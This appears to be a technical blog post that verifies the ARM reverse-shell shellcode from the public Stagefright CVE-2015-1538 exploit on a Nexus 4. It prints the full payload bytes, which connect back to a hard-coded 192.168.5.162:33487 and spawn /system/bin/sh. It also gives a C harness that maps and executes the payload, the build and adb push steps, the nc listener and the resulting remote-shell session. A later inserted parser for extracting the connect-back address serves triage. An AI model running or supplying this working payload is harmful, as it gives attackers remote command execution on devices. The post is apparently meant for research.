Android: verifying shell reverse tcp on a Nexus 4 @ android-5.1.1_r19

Recently I wanted to check whether the shell reverse tcp payload in https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py works correctly on a Nexus 4 @ android-5.1.1_r19.

The test code is as follows:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/mman.h>

const unsigned char payload[] = 
//    # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
//    # fork
    "\x02\x70\xa0\xe3"
    "\x00\x00\x00\xef"
//    # continue if not parent...
    "\x00\x00\x50\xe3"
    "\x02\x00\x00\x0a"
//    # exit parent
    "\x00\x00\xa0\xe3"
    "\x01\x70\xa0\xe3"
    "\x00\x00\x00\xef"
//    # setsid in child
    "\x42\x70\xa0\xe3"
    "\x00\x00\x00\xef"
//    # socket/connect/dup2/dup2/dup2
    "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c"
    "\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60"
    "\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0"
    "\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1"
    "\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06"
    "\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00"
    "\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0"
    "\xe3\x00\x00\x00\xef"
//    # execve(shell, argv, env)
    "\x30\x00\x8f\xe2\x04\x40\x24\xe0"
    "\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d"
    "\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00"
    "\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00"
    "\xef\x02\x00"
//    # Add the connect back host/port 192.168.5.162:33487
    "\x82\xcf" "\xc0\xa8\x05\xa2"
//    # shell -
    "/system/bin/sh\x00\x00"
//    # argv -
    "sh\x00\x00"
//    # env -
    "PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00";

int main(int argc, char *argv[])
{
	/* Map a readable, writable and executable anonymous page for the payload. */
	char *a = mmap(0, sizeof(payload), PROT_READ | PROT_EXEC | PROT_WRITE,
			MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (a == (char *)MAP_FAILED) {
		printf("Failed to mmap payload memory %d(%s)!\n", errno, strerror(errno));
		return 0;
	}

	/* Copy the payload into the executable mapping. */
	memcpy(a, payload, sizeof(payload));

	/* Jump into the payload: it forks, the parent exits, the child connects back. */
	((void (*)(void))a)();

	return 0;
}

NOTE: the default connect-back IP address and port (hard-coded in the payload) are 192.168.5.162:33487
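As an added example (not code from the post or from the exploit repository): a small C parser that recovers the connect-back address from a captured copy of this payload for triage, by locating the 8-byte AF_INET sockaddr_in that sits immediately before the shell path. The sample bytes are constructed from the tail of the payload above; the layout (sockaddr_in directly followed by the shell path) is assumed to be the one that payload uses.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: the tail of the payload shown above, i.e. the execve
 * syscall, the 8-byte sockaddr_in and the shell path that follows it. */
static const unsigned char sample_tail[] =
    "\x0b\x70\xa0\xe3\x00\x00\x00\xef"   /* mov r7, #11 ; svc 0  (execve) */
    "\x02\x00\x82\xcf\xc0\xa8\x05\xa2"   /* sockaddr_in: AF_INET, port, IPv4 */
    "/system/bin/sh\x00\x00";

struct c2_addr {
    uint16_t port;      /* host byte order */
    char     ip[16];    /* dotted quad */
    size_t   offset;    /* where the sockaddr_in starts in the blob */
};

/* Scan a captured blob for an AF_INET sockaddr_in that sits immediately
 * before the NUL-terminated shell path, the layout this payload uses.
 * Returns 1 and fills *out on success, 0 if no such structure is found. */
int extract_connect_back(const unsigned char *buf, size_t len,
                         const char *shell, struct c2_addr *out)
{
    size_t slen = strlen(shell);
    if (len < slen + 8)
        return 0;
    for (size_t i = 8; i + slen <= len; i++) {
        if (memcmp(buf + i, shell, slen) != 0)
            continue;
        const unsigned char *sa = buf + i - 8;
        if (sa[0] != 2 || sa[1] != 0)      /* sin_family == AF_INET, little-endian */
            continue;
        out->port = (uint16_t)((sa[2] << 8) | sa[3]);   /* sin_port is big-endian */
        snprintf(out->ip, sizeof out->ip, "%d.%d.%d.%d", sa[4], sa[5], sa[6], sa[7]);
        out->offset = i - 8;
        return 1;
    }
    return 0;
}

/* Result of parsing the constructed sample, kept in a global so it can be inspected. */
static struct c2_addr parsed;

int parse_sample(void)
{
    return extract_connect_back(sample_tail, sizeof sample_tail - 1,
                                "/system/bin/sh", &parsed);
}
```

For the sample above, parse_sample() fills parsed with 192.168.5.162:33487 at offset 8, matching the host/port comment in the payload.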

The corresponding Android.mk:

LOCAL_PATH:= $(call my-dir)

include $(CLEAR_VARS)

LOCAL_MODULE_TAGS := optional
LOCAL_MODULE := shellrevtcp

LOCAL_SRC_FILES:= \
	shell_reverse_tcp.c

LOCAL_CFLAGS := -Wno-unused-parameter

include $(BUILD_EXECUTABLE)

After building, push shellrevtcp to the phone:

$ adb push ${OUT}/system/bin/shellrevtcp /data/local/tmp/

In a terminal on the host with IP address 192.168.5.162, run:

hzak@B85RPI:/data/mako-5.1.1_r19/system/shellrevtcp$ nc -l 33487 -v
Listening on [0.0.0.0] (family 0, port 33487)

Then run /data/local/tmp/shellrevtcp inside adb shell (you need to run adb shell first; running adb shell /data/local/tmp/shellrevtcp directly fails). After that, shell commands can be executed from the terminal opened earlier, for example:

hzak@B85RPI:/data/mako-5.1.1_r19/system/shellrevtcp$ nc -l 33487 -v
Listening on [0.0.0.0] (family 0, port 33487)
Connection from [192.168.5.141] port 33487 [tcp/*] accepted (family 2, sport 58808)
ls -l
__bionic_open_tzdata_path: ANDROID_ROOT not set!
__bionic_open_tzdata_path: ANDROID_ROOT not set!
__bionic_open_tzdata_path: ANDROID_ROOT not set!
drwxr-xr-x root     root              2016-06-10 13:38 acct
drwxrwx--- system   cache             2016-03-08 03:52 cache
lrwxrwxrwx root     root              1970-01-01 00:00 charger -> /sbin/healthd
dr-x------ root     root              2016-06-10 13:38 config
lrwxrwxrwx root     root              2016-06-10 13:38 d -> /sys/kernel/debug
drwxrwx--x system   system            2016-06-10 13:46 data
-rw-r--r-- root     root          329 1970-01-01 00:00 default.prop
drwxr-xr-x root     root              2016-06-10 13:39 dev
lrwxrwxrwx root     root              2016-06-10 13:38 etc -> /system/etc
...


References:

  1. https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/
  2. https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
  3. https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py
  4. https://www.blackhat.com/docs/us-15/materials/us-15-Drake-Stagefright-Scary-Code-In-The-Heart-Of-Android.pdf
  5. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1538
  6. http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html
